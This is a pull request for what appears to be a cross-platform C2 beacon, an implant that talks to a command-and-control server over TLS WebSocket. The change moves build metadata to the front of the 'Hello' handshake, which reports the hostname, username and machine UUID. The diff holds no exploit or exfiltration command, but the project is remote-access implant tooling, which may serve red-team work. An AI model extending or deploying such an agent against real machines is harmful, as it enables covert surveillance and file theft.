### PR TITLE
Move build info to front of Hello response and bump API version

### DIFF
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -42,11 +42,13 @@ include(${CMAKE_SOURCE_DIR}/cmake/Common.cmake)
 # =============================================================================
 set(BUILD_NUMBER "0" CACHE STRING "Agent build number")
 set(COMMIT_HASH "00000000" CACHE STRING "Agent commit hash")
-set(API_VERSION "4" CACHE STRING "Agent API version")
+set(API_VERSION "5" CACHE STRING "Agent API version")
+set(NAME_ID "0" CACHE STRING "Agent name identifier")
 list(APPEND PIR_DEFINES
     AGENT_BUILD_NUMBER=${BUILD_NUMBER}
     AGENT_COMMIT_HASH="${COMMIT_HASH}"
     AGENT_API_VERSION=${API_VERSION}
+    AGENT_NAME_ID=${NAME_ID}
 )
 
 include(${PIR_ROOT_DIR}/cmake/Target.cmake)

--- a/README.md
+++ b/README.md
@@ -49,7 +49,7 @@ This project solves that: a full C++23 codebase that compiles to position-indepe
 - **Cross-Platform** - 8 platforms (Windows, Linux, macOS, FreeBSD, Solaris, UEFI, Android, iOS) across 7 architectures (i386, x86_64, armv7a, aarch64, riscv32, riscv64, mips64) via direct syscalls
 - **TLS 1.3 + WebSocket** - Encrypted command-and-control over `wss://` using ChaCha20-Poly1305 AEAD (RFC 8446, RFC 6455)
 - **Binary Command Protocol** - 11 command types over WebSocket:
-  - `Hello` - handshake: `SystemInfo` (machine UUID, hostname, username, CPU architecture, agent platform, OS version) + `AgentBuildInfo` + 64-bit `CapabilityMask`
+  - `Hello` - handshake: `AgentBuildInfo` (API version, agent name id, commit hash — first, so the C2 can determine the packet structure) + `SystemInfo` (machine UUID, hostname, username, CPU architecture, agent platform, OS version) + 64-bit `CapabilityMask`
   - `GetDirectoryContent` - Directory listing with metadata
   - `GetFileContent` - File read at offset
   - `GetFileChunkHash` - SHA-256 hash of file chunk
@@ -372,11 +372,13 @@ All commands use a binary protocol over WebSocket. Each message starts with a `U
 
 ### `Hello` (0x00)
 
-Handshake: returns system identification, build metadata, and a 64-bit
-capability mask so the C2 can determine which feature categories this beacon supports.
+Handshake: returns build metadata first (so the C2 can identify the agent and
+packet structure before parsing the rest), then system identification, and a
+64-bit capability mask so the C2 can determine which feature categories this
+beacon supports.
 
 - **Request**: No payload (command type byte only)
-- **Response**: `UINT32 status` + `SystemInfo` + `AgentBuildInfo` + `CapabilityMask` (8 bytes)
+- **Response**: `UINT32 status` + `AgentBuildInfo` + `SystemInfo` + `CapabilityMask` (8 bytes)
 
 `SystemInfo` layout (packed):
 
@@ -389,13 +391,14 @@ capability mask so the C2 can determine which feature categories this beacon sup
 | `AgentPlatform` | `CHAR[32]`   | OS target (`windows`, `linux`, `macos`, etc.) — compile-time        |
 | `OSVersion`     | `CHAR[128]`  | Runtime OS version (`Windows 10.0 Build 19045`, `Linux 6.1.0`)     |
 
-`AgentBuildInfo` layout (packed):
+`AgentBuildInfo` layout (packed) — sent first so the C2 can identify the agent and packet structure immediately:
 
 | Field          | Type        | Description                                      |
 |----------------|-------------|--------------------------------------------------|
-| `BuildNumber`  | `UINT32`    | Auto-incrementing build number (git commit count) |
+| `ApiVersion`   | `UINT32`    | Agent API version (currently `5`; bumped on breaking protocol changes) |
+| `AgentNameId`  | `UINT32`    | Agent implementation identifier (`AGENT_NAME_ID`, currently `0` = PIA) |
 | `CommitHash`   | `CHAR[9]`   | Short git commit hash (8 hex chars + null)        |
-| `ApiVersion`   | `UINT32`    | Agent API version (currently `4`; bumped on breaking protocol changes) |
+| `BuildNumber`  | `UINT32`    | Auto-incrementing build number (git commit count) |
 | `Is64Bit`      | `BOOL`      | `true` iff this agent binary is 64-bit (`sizeof(void*) == 8`); agent pointer width, not OS |
 
 `CapabilityMask` layout (packed, 8 bytes = 64 bits, LSB-first per byte):

--- a/docs/02-project-overview.md
+++ b/docs/02-project-overview.md
@@ -100,7 +100,7 @@ The agent supports 11 commands, dispatched via a function pointer array (see `do
 
 | Command | What It Does |
 |---------|-------------|
-| `Hello` | Handshake: collects hostname, username, OS version, machine UUID, CPU architecture + reports a 64-bit capability mask |
+| `Hello` | Handshake: build info header first (API version, agent name id, commit hash), then hostname, username, OS version, machine UUID, CPU architecture + a 64-bit capability mask |
 | `GetDirectoryContent` | Lists files and folders in a directory (like `ls` or `dir`) |
 | `GetFileContent` | Reads a file at a specified offset |
 | `GetFileChunkHash` | SHA-256 hash of a file chunk (for integrity checking) |

--- a/docs/13-beacon.md
+++ b/docs/13-beacon.md
@@ -173,13 +173,18 @@ The `AgentBuildInfo` struct in `commands.h` follows the same pattern:
 #pragma pack(push, 1)
 struct AgentBuildInfo
 {
-    UINT32 BuildNumber;
+    UINT32 ApiVersion;  // Agent API version (bumped on breaking protocol changes)
+    UINT32 AgentNameId; // Agent implementation identifier (AGENT_NAME_ID)
     CHAR CommitHash[9]; // 8 hex chars + null
-    UINT32 ApiVersion;
+    UINT32 BuildNumber;
     BOOL Is64Bit; // true iff this agent binary is 64-bit (sizeof(void*) == 8)
 };
 #pragma pack(pop)
 ```
+
+It is sent at the **start** of the Hello response (right after the status
+code) so the C2 can read `ApiVersion`/`AgentNameId` and immediately determine
+which packet structure to expect before parsing the rest of the payload.
 
 ---
 

--- a/src/beacon/README.md
+++ b/src/beacon/README.md
@@ -22,7 +22,7 @@ Top-level application layer — connects to a relay server over WebSocket (TLS 1
 │       │                                                     │
 │  ┌────┴─────────────────────────────────────────────────┐   │
 │  │              Command Handlers                        │   │
-│  ├─ Hello               → SystemInfo, build info + mask │   │
+│  ├─ Hello               → build info, SystemInfo + mask │   │
 │  ├─ GetDirectoryContent → DirectoryIterator             │   │
 │  ├─ GetFileContent      → File::Open + Read             │   │
 │  ├─ GetFileChunkHash    → File read + SHA-256           │   │

--- a/src/beacon/commands.h
+++ b/src/beacon/commands.h
@@ -55,16 +55,23 @@ enum CommandType : UINT8
 #define AGENT_COMMIT_HASH "00000000"
 #endif
 #ifndef AGENT_API_VERSION
-#define AGENT_API_VERSION 4
+#define AGENT_API_VERSION 5
+#endif
+#ifndef AGENT_NAME_ID
+#define AGENT_NAME_ID 0
 #endif
 
-// Build metadata appended to the Hello response
+// Build metadata header prepended to the Hello response (right after the
+// status code). ApiVersion and AgentNameId lead the packet so the C2 can
+// identify the agent and determine the expected packet structure before
+// parsing the variable rest of the response.
 #pragma pack(push, 1)
 struct AgentBuildInfo
 {
+    UINT32 ApiVersion;  ///< Agent API version (bumped on breaking protocol changes)
+    UINT32 AgentNameId; ///< Agent implementation identifier (AGENT_NAME_ID)
+    CHAR CommitHash[9]; ///< 8 hex chars + null
     UINT32 BuildNumber;
-    CHAR CommitHash[9]; // 8 hex chars + null
-    UINT32 ApiVersion;
     BOOL Is64Bit; ///< true iff this agent binary is 64-bit (sizeof(void*) == 8)
 };
 #pragma pack(pop)

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -98,26 +98,28 @@ VOID Handle_HelloCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE 
     SystemInfo info;
     GetSystemInfo(&info);
 
-    // Append build metadata to the response
+    // Prepend build metadata header to the response so the C2 can identify the
+    // agent and packet structure before parsing the remaining payload
     AgentBuildInfo buildInfo;
-    buildInfo.BuildNumber = AGENT_BUILD_NUMBER;
+    buildInfo.ApiVersion = AGENT_API_VERSION;
+    buildInfo.AgentNameId = AGENT_NAME_ID;
     const CHAR commitHash[] = AGENT_COMMIT_HASH;
     Memory::Zero(buildInfo.CommitHash, sizeof(buildInfo.CommitHash));
     Memory::Copy(buildInfo.CommitHash, commitHash, sizeof(buildInfo.CommitHash) - 1);
-    buildInfo.ApiVersion = AGENT_API_VERSION;
+    buildInfo.BuildNumber = AGENT_BUILD_NUMBER;
     buildInfo.Is64Bit = (sizeof(void*) == 8);
 
     // 64-bit capability mask: bit i set iff category i (CapabilityBit) is supported.
     CapabilityMask capabilities = BuildCapabilityMask();
 
-    *responseLength = sizeof(UINT32) + sizeof(SystemInfo) + sizeof(AgentBuildInfo) + sizeof(CapabilityMask);
+    *responseLength = sizeof(UINT32) + sizeof(AgentBuildInfo) + sizeof(SystemInfo) + sizeof(CapabilityMask);
     *response = new CHAR[*responseLength];
     *(PUINT32)*response = StatusCode::StatusSuccess;
 
-    // Append system info, build info, and capability mask to the response buffer
-    Memory::Copy(*response + sizeof(UINT32), &info, sizeof(SystemInfo));
-    Memory::Copy(*response + sizeof(UINT32) + sizeof(SystemInfo), &buildInfo, sizeof(AgentBuildInfo));
-    Memory::Copy(*response + sizeof(UINT32) + sizeof(SystemInfo) + sizeof(AgentBuildInfo), &capabilities, sizeof(CapabilityMask));
+    // Append build info header, system info, and capability mask to the response buffer
+    Memory::Copy(*response + sizeof(UINT32), &buildInfo, sizeof(AgentBuildInfo));
+    Memory::Copy(*response + sizeof(UINT32) + sizeof(AgentBuildInfo), &info, sizeof(SystemInfo));
+    Memory::Copy(*response + sizeof(UINT32) + sizeof(AgentBuildInfo) + sizeof(SystemInfo), &capabilities, sizeof(CapabilityMask));
 
     LOG_INFO("Hello: hostname=%s, username=%s, arch=%s, agent_platform=%s, os_version=%s, build=%u, commit=%s, api=%u",
              info.Hostname, info.Username, info.Architecture, info.AgentPlatform, info.OSVersion, buildInfo.BuildNumber, buildInfo.CommitHash, buildInfo.ApiVersion);

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -103,9 +103,10 @@ VOID Handle_HelloCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE 
     AgentBuildInfo buildInfo;
     buildInfo.ApiVersion = AGENT_API_VERSION;
     buildInfo.AgentNameId = AGENT_NAME_ID;
-    const CHAR commitHash[] = AGENT_COMMIT_HASH;
-    Memory::Zero(buildInfo.CommitHash, sizeof(buildInfo.CommitHash));
-    Memory::Copy(buildInfo.CommitHash, commitHash, sizeof(buildInfo.CommitHash) - 1);
+const CHAR commitHash[] = AGENT_COMMIT_HASH;
+Memory::Zero(buildInfo.CommitHash, sizeof(buildInfo.CommitHash));
+const USIZE commitHashChars = (sizeof(commitHash) - 1 < sizeof(buildInfo.CommitHash) - 1) ? (sizeof(commitHash) - 1) : (sizeof(buildInfo.CommitHash) - 1);
+Memory::Copy(buildInfo.CommitHash, commitHash, commitHashChars);
     buildInfo.BuildNumber = AGENT_BUILD_NUMBER;
     buildInfo.Is64Bit = (sizeof(void*) == 8);
 


### PR DESCRIPTION
## Summary
  
  Restructured the `Hello` (0x00) response so build metadata forms a header at the front of the packet: the response is now `UINT32 status` + `AgentBuildInfo` +  
  `SystemInfo` + `CapabilityMask` (was `status` + `SystemInfo` + `AgentBuildInfo` + `CapabilityMask`). `AgentBuildInfo` was reordered to lead with `ApiVersion`   
  and a new `AgentNameId` field (backed by a new `AGENT_NAME_ID` macro, default `0`), so the C2 can identify the agent implementation and determine the expected  
  packet structure before parsing the variable rest of the response. **Breaking wire change** — API version bumped 4 → 5.
     
  ## Type of Change
     
  - [ ] Bug fix
  - [x] New feature / command
  - [ ] Refactoring (no functional changes)
  - [ ] Documentation
  - [ ] Build system / CI
  - [ ] Other: breaking protocol change (API v4 → v5)
  
  ## Platforms Tested

  - [x] `windows-x86_64-release`
  - [ ] `linux-x86_64-release`
  - [ ] `macos-aarch64-release`
  - [x] Other: `linux-x86_64-debug` with `-DBUILD_TESTS=ON -DENABLE_LOGGING=ON` — full test suite passes (`ALL TESTS PASSED`)

  ## Binary Size Impact

  Preset: windows-x86_64-release
  Before: exe 103038, bin 103038
  After:  exe 103038, bin 103038
  Diff:   +0 B

  (Binaries verified byte-different vs. a HEAD baseline build, so the size match is real, not a stale artifact.)

  ## Checklist

  - [x] Build passes with no warnings for at least one preset
  - [x] Post-build PIC verification passes (no `.rdata`/`.rodata`/`.data`/`.bss` sections)
  - [x] Code follows [naming conventions](CONTRIBUTING.md#naming-conventions) and [code style](CONTRIBUTING.md#code-style)
  - [x] Doxygen documentation added for new public APIs
  - [x] No STL, no exceptions, no RTTI
  - [x] `Result<T, Error>` used for all fallible functions (N/A here — `Handle_HelloCommand` has no fallible paths; it follows the status-code handler convention)
  - [x] Binary size diff reported above
  - [x] README updated (if adding/modifying commands)

  ## Additional Notes

  - **Breaking change for C2 clients:** the Hello response layout changed and `AgentBuildInfo` fields were reordered. Clients parsing the v4 layout will misread  
  the packet; gate on `ApiVersion == 5`.
  - New `AgentBuildInfo` layout (packed, 25 bytes): `UINT32 ApiVersion` + `UINT32 AgentNameId` + `CHAR CommitHash[9]` + `UINT32 BuildNumber` + `BOOL Is64Bit`.    
  `AGENT_NAME_ID` defaults to `0` (PIA) and is overridable via the new CMake `NAME_ID` cache variable, same pattern as `BUILD_NUMBER`/`COMMIT_HASH`/`API_VERSION`.
  - **Build-dir gotcha:** `API_VERSION` is a CMake *cache* variable — existing build directories will keep the stale `4` on reconfigure. Pass `-DAPI_VERSION=5`   
  (or delete the build dir) when building from an old cache.
  - Documentation updated everywhere the layout is described: `README.md` (feature list, Hello section, `AgentBuildInfo` table), `docs/13-beacon.md`,
  `docs/02-project-overview.md`, `src/beacon/README.md`.